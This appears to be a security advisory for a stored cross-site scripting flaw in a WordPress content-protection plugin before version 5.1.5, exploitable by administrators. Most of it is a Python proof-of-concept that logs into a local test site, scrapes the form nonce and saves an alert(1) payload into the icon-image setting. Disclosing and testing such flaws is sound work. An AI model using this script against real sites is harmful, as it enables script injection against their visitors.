Secure Copy Content Protection and Content Locking < 5.1.5 – Admin+ Stored XSS via ays_sccp_sub_icon_image Parameter | CVE 2026-9269

Description

The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).

Proof of Concept

#!/usr/bin/env python3
import requests

BASE_URL = "http://localhost:8080"
LOGIN_URL = f"{BASE_URL}/wp-login.php"
SETTINGS_URL = f"{BASE_URL}/wp-admin/admin.php?page=secure-copy-content-protection-settings"

USERNAME = "admin"
PASSWORD = "admin123"

PAYLOAD = 'x" onerror="alert(1)'

def main():
    session = requests.Session()

    session.post(LOGIN_URL, data={
        "log": USERNAME,
        "pwd": PASSWORD,
        "wp-submit": "Log In"
    }, allow_redirects=True)

    response = session.get(SETTINGS_URL)

    import re
    nonce_match = re.search(r'name="settings_action" value="([^"]+)"', response.text)
    nonce = nonce_match.group(1) if nonce_match else ""

    tab_match = re.search(r'name="ays_sccp_tab"[^>]*value="([^"]+)"', response.text)
    ays_sccp_tab = tab_match.group(1) if tab_match else "0"

    data = {
        "settings_action": nonce,
        "ays_sccp_tab": ays_sccp_tab,
        "ays_sccp_sub_icon_image": PAYLOAD,
        "ays_submit": "Save changes"
    }

    session.post(SETTINGS_URL, data=data, allow_redirects=True)

    print(SETTINGS_URL)

if __name__ == "__main__":
    main()